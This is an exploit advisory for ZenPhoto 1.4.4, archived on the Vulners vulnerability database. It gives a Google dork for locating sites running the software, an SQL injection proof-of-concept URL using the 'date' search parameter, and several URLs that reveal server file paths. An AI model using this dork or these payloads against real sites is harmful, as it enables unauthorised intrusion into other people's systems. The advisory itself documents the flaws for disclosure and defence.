Vulners
Lucene search
ZenPhoto 1.4.4 Path Disclosure / SQL Injection
`
###########################################
#-----------------------------------------#
#[ 0-DAY Aint DIE | No Priv8 | KedAns-Dz ]#
#-----------------------------------------#
# *----------------------------* #
# K |....##...##..####...####....| . #
# h |....#...#........#..#...#...| A #
# a |....#..#.........#..#....#..| N #
# l |....###........##...#.....#.| S #
# E |....#.#..........#..#....#..| e #
# D |....#..#.........#..#...#...| u #
# . |....##..##...####...####....| r #
# *----------------------------* #
#-----------------------------------------#
#[ Copyright © 2014 | Dz Offenders Cr3w ]#
#-----------------------------------------#
###########################################
# >> D_x . Made In Algeria . x_Z << #
######################################################################
#
# [>] Title : ZenPhoto v1.4.4 (SQLi/Disclosure) Multiple Vulnerabilities
#
# [>] Author : KedAns-Dz
# [+] E-mail : ked-h (@hotmail.com)
# [+] FaCeb0ok : fb.me/K3d.Dz
# [+] TwiTter : @kedans
#
# [#] Platform : PHP / WebApp
# [+] Cat/Tag : SQL Injection , Multiple Full Path Disclosure
#
# [<] <3 <3 Greetings t0 Palestine <3 <3
# [>] ^_^ Greetings to 1337day Users/FAN's <3 *_* , i'm leaving 1337day
# [-] F-ck Hacking , LuV Exploiting .. Penetration-Testing rouls
#
#######################################################################
#
# [!] Description :
#
# ZenPhoto version 1.4.4 is suffer from multiple vulnerabilities
# remote attacker can use some MySQL bug in (&date=) and exploit it
# as SQL Injection ,and access to some files and get errors with the
# Full Path of this files and use it to disclosure the target full path.
#
# [!] CWE = CWE-89 , CWE-22
#
#####
# [!] Google Dork :
# intext:"Powered by zenPHOTO"
#####
# [+] Exploit (1) ' SQL Injection ' :=>
#
# - http://[target]/[path]/index.php?p=search&date='
# - http://127.0.0.1/zenphoto/index.php?p=search&date=' [SQL Injection]
#
# - p.o.c image : (http://oi41.tinypic.com/zme90m.jpg)
#
#####
# [+] Exploit (2) ' Full Path Disclosure ' :
#
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/tiny_mce.php
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_http.php
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_flash.php
# - http://127.0.0.1/zenphoto/zp-core/zp-extensions/uploader_jQuery.php
# - http://127.0.0.1/zenphoto/zp-core/utilities/refresh_database.php
# - http://127.0.0.1/zenphoto/zp-core/utilities/refresh_metadata.php
#
#######################################################################
####
# <! THE END ^_* ! , Good Luck all <3 | 0-DAY Aint DIE ^_^ !>
# Hassi Messaoud (30500) , 1850 city/hood si' elHaouass .<3
#---------------------------------------------------------------
# Greetings to my Homies : Indoushka , Caddy-Dz , Kalashinkov3 ,
# Chevr0sky , Mennouchi.Islem , KinG Of PiraTeS , TrOoN , T0xic,
# & Jago-dz , Over-X , Kha&miX , Ev!LsCr!pT_Dz , Barbaros-DZ , &
# & KnocKout , Angel Injection , The Black Divels , kaMtiEz , &
# & Evil-Dz , Elite_Trojan , MalikPc , Marvel-Dz , Shinobi-Dz, &
# & Keystr0ke , JF , r0073r , CroSs , Inj3ct0r/Milw0rm 1337day &
# =( packetstormsecurity.org * metasploit.com * OWASP & OSVDB )=
####
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
24 Jan 2014 00:00Current
0.4Low risk
Vulners AI Score0.4